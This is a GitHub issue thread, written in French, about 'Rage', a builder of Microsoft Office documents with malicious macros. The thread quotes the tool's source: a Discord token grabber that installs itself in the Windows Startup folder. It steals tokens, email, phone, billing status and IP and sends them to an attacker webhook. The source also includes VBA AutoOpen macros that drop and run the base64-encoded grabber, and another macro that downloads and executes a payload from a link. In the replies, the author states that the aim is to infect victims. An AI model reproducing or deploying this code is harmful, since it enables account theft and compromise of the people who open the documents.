search

billythegoat356 / Rage

Rage allows you to execute any file in a Microsoft Office document.
Eclipse Public License 2.0
72 stars 7 forks source link

non cest pas un token grab (lisez le code svp) #2

Open dazd-pkz opened 2 years ago

dazd-pkz commented 2 years ago

path = "%s/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/rage.pyw" % getenv("userprofile") if not isfile(path): copy(file, path) startfile(path) remove(file) exit() elif file.replace('\', '/') != path.replace('\', '/'): exit() webhook = '""" + webhook + r"""' pingme = """ + str(ping) + r""" class Discord: def setheaders(token: str = None) -> dict: headers = {'content-type': 'application/json', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'} if token: headers['authorization'] = token return headers def get_tokens() -> list: tokens = [] LOCAL = getenv("LOCALAPPDATA") ROAMING = getenv("APPDATA") PATHS = { "Discord": ROAMING + "\Discord", "Discord Canary": ROAMING + "\discordcanary", "Discord PTB": ROAMING + "\discordptb", "Google Chrome": LOCAL + "\Google\Chrome\User Data\Default", "Opera": ROAMING + "\Opera Software\Opera Stable", "Brave": LOCAL + "\BraveSoftware\Brave-Browser\User Data\Default", "Yandex": LOCAL + "\Yandex\YandexBrowser\User Data\Default" } def search(path: str) -> list: path += "\Local Storage\leveldb" found_tokens = [] if isdir(path): for file_name in listdir(path): if not file_name.endswith(".log") and not file_name.endswith(".ldb"): continue for line in [x.strip() for x in open(f"{path}\{file_name}", errors="ignore").readlines() if x.strip()]: for regex in (r"[\w-]{24}.[\w-]{6}.[\w-]{27}", r"mfa.[\w-]{84}"): for token in findall(regex, line): try: urlopen(Request( "https://discord.com/api/v9/users/@me", headers=Discord.setheaders(token))) except HTTPError: continue if token not in found_tokens and token not in tokens: found_tokens.append(token) return found_tokens for path in PATHS: for token in search(PATHS[path]): tokens.append(token) return tokens class Grab: def token_grab(token: str): def getavatar(uid, aid) -> str: url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}" try: urlopen(Request(url, headers=Discord.setheaders())) except HTTPError: url += ".gif" return url def has_payment_methods(token) -> bool: has = False try: has = bool(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=Discord.setheaders(token))).read())) except: pass return has valid, invalid = "<:valide:858700826499219466>", "<:invalide:858700726905733120>" def verify(var): return valid if var else invalid user_data = loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=Discord.setheaders(token))).read()) ip = loads(urlopen(Request('http://ipinfo.io/json')).read())['ip'] computer_username = getenv("username") username = user_data["username"] + \ "#" + str(user_data["discriminator"]) user_id = user_data["id"] avatar_id = user_data["avatar"] avatar_url = f"https://cdn.discordapp.com/avatars/{user_id}/{avatar_id}" email = user_data.get("email") phone = user_data.get("phone") mfa_enabled = bool(user_data['mfa_enabled']) email_verified = bool(user_data['verified']) billing = bool(has_payment_methods(token)) nitro = bool(user_data.get("premium_type")) nitro = valid if nitro else invalid email_verified = verify(email_verified) billing = verify(billing) mfa_enabled = verify(mfa_enabled) if not phone: phone = invalid data = [{ "title": "Rage", "description": "Grabbed!", "url": "https://github.com/billythegoat356/Rage", "image": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "color": 0xCB4335, "fields": [ { "name": "Infos Du Compte", "value": f'Email: {email}\nTéléphone: {phone}\nPaiement: {billing}', "inline": True }, { "name": "Infos du PC", "value": f"IP: {ip}\nUtilisateur: {computer_username}", "inline": True }, { "name": "Infos Supplémentaires", "value": f'Nitro: {nitro}\n2FA: {mfa_enabled}', "inline": False }, { "name": "Token", "value": f"||{token}||", "inline": False } ], "author": { "name": f"{username}", "icon_url": avatar_url }, "thumbnail": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "footer": { "text": "by billythegoat356" } }] Grab.send(data) def send(data: str): data = {"username": "Rage", "avatar_url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb", "embeds": data, "content": "@everyone" if pingme else ""} return urlopen(Request(webhook, data=dumps(data).encode('utf-8'), headers=Discord.setheaders())) sent_tokens = [] def token_grab(): for token in Discord.get_tokens(): if token not in sent_tokens: Grab.token_grab(token) sent_tokens.append(token) ready_data = [{ "title": "Rage", "description": "Initialized!", "url": "https://github.com/billythegoat356/Rage", "image": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "color": 0xCB4335, "fields": [ { "name": "Ready!", "value": 'I am ready to find some tokens!', "inline": True } ], "thumbnail": { "url": "https://repository-images.githubusercontent.com/431654731/72e437c2-c3ed-4b68-994a-a88b7b6c1bfb" }, "footer": { "text": "by billythegoat356" } }] Grab.send(ready_data) while True: if not isfile(file): exit() token_grab() """

e = b64encode(code.encode('cp850')).decode('cp850')

encoded = [e[:900], e[900:1800], e[1800:2700], e[2700:3600], e[3600:4500], e[4500:5400], e[5400:6300], e[6300:7200], e[7200:8100], e[8100:9000], e[9000:9900], e[9900:]]

script = []

for _ in range(len(encoded)):
    chars = ""
    for char in encoded[0]:
        chars += char
    encoded = [l for l in encoded[1:]]
    script.append(chars)

vba =  """Sub AutoOpen()
folder = "C:/Users/" & Environ("username")
Exists = Dir(folder, vbDirectory)

If Exists = "" Then
    folder = "C:/Users/OneDrive/" & Environ("username")

End If

ChDir (folder)

myFile = "_rage.py"
Open myFile For Output As #1
"""

vba += f"""Print #1, "b64list=''.join('''"
"""

for line in script:
    vba += f"""Print #1, "{line}"
"""

vba += f"""Print #1, "'''.splitlines());exec(__import__('base64').b64decode(b64list).decode('cp850'))"
"""

vba += """Close #1
Shell ("python _rage.py")

End Sub""" return vba

def mkcustomscript(link: str, extension: str) -> str:

return f"""Sub AutoOpen()
folder = "C:/Users/" & Environ("username")
Exists = Dir(folder, vbDirectory)

If Exists = "" Then
    folder = "C:/Users/OneDrive/" & Environ("username")

End If

ChDir (folder)

Dim URL As String
URL = "{link}"

Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", URL, False
WinHttpReq.send

Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
oStream.SaveToFile "_rage{extension}", 2
oStream.Close

myFile = "_rage_exec.bat"
Open myFile For Output As #1
Print #1, "start _rage{extension}"
Close #1
Shell ("_rage_exec.bat")

End Sub"""

dazd-pkz commented 2 years ago

ton histoire : + Very advanced token grabber click here to learn more, c'est cool mais le prob c'est qu'il execute tout ca au demarrage si je comprend bien donc bizarre hein ?

dit moi si je me trompe avec argument biensur !

billythegoat356 commented 2 years ago

le fichier se deplace au démarrage, et s execute en arriere plan oui ;) pourquoi tu trouves ça bizarre? cest le but du token grabber, infecter la victime...

dazd-pkz commented 2 years ago

rage c'est pas un logiciel pour pouvoir rendre "infecté" des fichiers word ? si oui, pourquoi on le fou au demarrage du .py ?

dazd-pkz commented 2 years ago

le but (de ce que je sais) c'est d'aider les gens a infecté le fichier, pas les infectés ?

billythegoat356 commented 2 years ago

parce quil ya un mode qui injecte un script python dans le fichier word, ce script python va se deplacer au demarrage pour que la victime soit infectée. lis le code...